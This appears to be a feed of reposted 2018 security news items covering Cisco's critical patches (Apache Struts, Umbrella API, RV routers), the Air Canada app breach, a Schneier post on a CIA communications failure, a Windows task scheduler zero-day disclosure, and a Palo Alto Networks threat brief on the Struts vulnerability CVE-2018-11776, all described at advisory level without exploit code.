An unauthenticated, remote attacker can trigger the vulnerability by tricking victims to visit a specially crafted URL on the affected web server, allowing the attacker to execute malicious code and eventually take complete control over the targeted server running the vulnerable application.

All applications that use Apache Struts—supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions—are potentially vulnerable to this flaw, even when no additional plugins have been enabled.

Apache Struts patched the vulnerability with the release of Struts versions 2.3.35 and 2.5.17 last month. Now, Cisco has also released fixes to address the issue in its several products. You can check the list of vulnerable Cisco products here.

Since there are no workarounds for this issue, organizations and developers are strongly advised to update their Struts components as soon as possible.

Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435)

The second critical vulnerability patched by Cisco resides in the Cisco Umbrella API that could allow an authenticated, remote attacker to view and modify data across their organization as well as other organizations.

Cisco Umbrella is a cloud security platform that provides the first line of defense against threats over all ports and protocols by blocking access to malicious domains, URLs, IPs, and files before a connection is ever established or a file is downloaded.

The vulnerability resides due to insufficient authentication configurations for the API interface of Cisco Umbrella, and successful exploitation could allow an attacker to read or modify data across multiple organizations.

Cisco has patched the vulnerability addressed this vulnerability in the Cisco Umbrella production APIs. No user action is required.

Cisco Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423)

The last, but not the least, critical vulnerability resides in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router that could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition.

The flaw occurs due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface.

To exploit this vulnerability, an attacker can send malicious requests to a targeted device, triggering a buffer overflow condition.

“A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code,” the company explains.

This vulnerability affects all releases of Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router.

Cisco has addressed this vulnerability in firmware release for the Cisco RV130W Wireless-N Multifunction VPN Router, and will not release firmware updates for the Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router.

According to the company’s Product Security Incident Response Team (PSIRT), Apache Struts is being exploited in the wild, while the team is not aware of any exploits leveraging the other two critical flaws.

Go to Source

Air Canada Suffers Data Breach — 20,000 Mobile App Users Affected

Air Canada has confirmed a data breach that may have affected about 20,000 customers of its 1.7 million mobile app users.

The company said it had “detected unusual log-in behavior” on its mobile app between August 22 and 24, during which the personal information for some of its customers “may potentially have been improperly accessed.”

The exposed information contains basic information such as customers’ names, email addresses, phone numbers, and other information they have added to their profiles.

Passport Numbers Exposed in Air Canada Data Breach

However, what’s worrisome?

Hackers could have also accessed additional data including customer’s passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality, if users had this information saved in their profile on the Air Canada mobile app.

The airline assured its customers that credit card information saved to their profile was “encrypted and stored in compliance with security standards set by the payment card industry or PCI standards,” and therefore, are protected.

However, Air Canada still recommended affected customers to always monitor their credit card transactions and contact their financial services provider immediately if they found any unusual or unauthorized activity.

Reset Your Password

The company estimates about 1% of its 1.7 million people—or about 20,000 users in total—who use its mobile app may have been affected by the security breach.

Although currently, it is not clear how the data breach occurred, if it was a direct breach of Air Canada’s systems, or if it was due to the reuse of passwords from other sites, the airline encourages users to reset their passwords using improved password guidelines, which says passwords should be at least 10 characters long and contain one symbol.

However, as a precaution, the airline has locked down all 1.7 million accounts until all of its customers—even those whose information was not exposed in the breach—change their passwords.

Air Canada has contacted potentially affected customers directly by email starting August 29 to tell them if their account has potentially been accessed by hackers improperly.

Go to Source

CIA Network Exposed Through Insecure Communications System

Interesting story of a CIA intelligence network in China that was exposed partly because of a computer-security failure:

Although they used some of the same coding, the interim system and the main covert communication platform used in China at this time were supposed to be clearly separated. In theory, if the interim system were discovered or turned over to Chinese intelligence, people using the main system would still be protected — and there would be no way to trace the communication back to the CIA. But the CIA’s interim system contained a technical error: It connected back architecturally to the CIA’s main covert communications platform. When the compromise was suspected, the FBI and NSA both ran “penetration tests” to determine the security of the interim system. They found that cyber experts with access to the interim system could also access the broader covert communications system the agency was using to interact with its vetted sources, according to the former officials.

In the words of one of the former officials, the CIA had “fucked up the firewall” between the two systems.

U.S. intelligence officers were also able to identify digital links between the covert communications system and the U.S. government itself, according to one former official — links the Chinese agencies almost certainly found as well. These digital links would have made it relatively easy for China to deduce that the covert communications system was being used by the CIA. In fact, some of these links pointed back to parts of the CIA’s own website, according to the former official.

People died because of that mistake.

The moral — which is to go back to pre-computer systems in these hihg-risk sophisticated-adversary circumstances — is the right one, I think.

Go to Source
Author: Bruce Schneier

Hacker Discloses Unpatched Windows Zero-Day Vulnerability (With PoC)

A security researcher has publicly disclosed the details of a previously unknown zero-day vulnerability in the Microsoft’s Windows operating system that could help a local user or malicious program obtain system privileges on the targeted machine.

And guess what? The zero-day flaw has been confirmed working on a “fully-patched 64-bit Windows 10 system.”

The vulnerability is a privilege escalation issue which resides in the Windows’ task scheduler program and occured due to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Advanced local procedure call (ALPC) is an internal mechanism, available only to Windows operating system components, that facilitates high-speed and secure data transfer between one or more processes in the user mode.

The revelation of the Windows zero-day came earlier today from a Twitter user with online alias SandboxEscaper, who also posted a link to a Github page hosting a proof-of-concept (PoC) exploit for the privilege escalation vulnerability in Windows.

“Here is the alpc bug as 0day: I don’t fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit,” SandboxEscaper tweeted (archive), which has now been deleted.


Zero-Day Works Well on Fully-Patched 64-Bit Windows 10 PC

Shortly after that, CERT/CC vulnerability analyst Will Dormann verified the authenticity of the zero-day bug, and tweeted:

“I’ve confirmed that this works well in a fully-patched 64-bit Windows 10 system. LPE right to SYSTEM!”

According to a short online advisory published by CERT/CC, the zero-day flaw, if exploited, could allow local users to obtain elevated (SYSTEM) privileges.

Since Advanced Local Procedure Call (ALPC) interface is a local system, the impact of the vulnerability is limited with a CVSS score of 6.4 to 6.8, but the PoC exploit released by the researcher could potentially help malware authors to target Windows users.

SandboxEscaper did not notify Microsoft of the zero-day vulnerability, leaving all Windows users vulnerable to the hackers until a security patch is release by the tech giant to address the issue.

Microsoft is likely to patch the vulnerability in its next month’s security Patch Tuesday, which is scheduled for September 11.

The CERT/CC notes it is currently unaware of any practical solution to this zero-day bug.

Go to Source

Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776

Situation Overview

On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. The Apache Foundation has urged everyone to apply the security updates as soon as possible.

This blog is to provide information to help organizations assess their risk of the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security updates. Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.

Vulnerability Information

According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts. The method of attack would be through a specially crafted URL sent to the vulnerable system. In most cases, this means no authentication is required to exploit the vulnerability.

A successful attack would run code in the security context that Struts is using. In some cases, this could effectively lead to a total compromise of the system.

It’s important to note, however, that the vulnerability is not exploitable in default configurations. The following two conditions must both be met for a system to be vulnerable to attack:

  1. The alwaysSelectFullNamespace flag is set to “true” in the Struts configuration. (Note: If your application uses the popular Struts Convention plugin this is set to “true” by default by the plugin.
  2. The Struts application uses “actions” that are configured without specifying a namespace, or with a wildcard namespace. This condition applies to actions and namespaces specified in the Struts configuration file . NOTE: your application uses the popular Struts Convention plugin this condition also applies to actions and namespaces specified in Java code.

If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.

In particular, if your application uses the popular Struts Convention plugin, it appears to potentially increase your risk of exploitability vis-à-vis other Struts implementations that do not use that plugin.

Threat Environment Information

The vulnerability was disclosed on August 22 in conjunction with security updates that address it. There is detailed information about the vulnerability and how to exploit it available currently. There is also proof of concept (PoC) code available already. As noted above, the PoC works only against systems that are vulnerable and meet both conditions for exploitability.

Some have noted that a previous critical Struts vulnerability was actively attacked last year only three days after the release of the security update and vulnerability information.

There are no known active attacks at this time and the current requirement that two, non-default conditions need to be met for the vulnerability to be exploitable makes for a different threat environment.

However with active PoC available we can expect at the minimum probing, if not active exploitation of this vulnerability in the near term.

Organizations should focus their risk assessments for possible attack until they can patch on four things:

  1. Are they using the Struts Convention plugin?
  2. Do they meet both of the required conditions for exploitation?
  3. Any weaponization or indication of attacks using the current PoC
  4. Developments of new PoC or attacks that render moot the two conditions required for exploitability?

Guidance and Protections for Palo Alto Networks Customers

All organizations running vulnerable versions of Apache Struts should deploy the security updates as soon as possible.

Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and  on currently available information.

Palo Alto Networks customers who have deployed vulnerability signatures released on August 24, 2018, which include ID 33948 Name: Apache Struts 2 Remote Code Execution Vulnerability, are protected against currently known exploits against that vulnerability.

Our customers should still deploy the security update as recommended above, but can and should deploy the latest vulnerability signature immediate for additional protection. With this addition protection available, our customers can and should include that as part of their decisions around security and deployment of the security updates and their risk assessment of the vulnerability and threat environment.

As always, we are monitoring the situation closely and will provide additional details as they become available.

The post Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776 appeared first on Palo Alto Networks Blog.

Go to Source
Author: Christopher Budd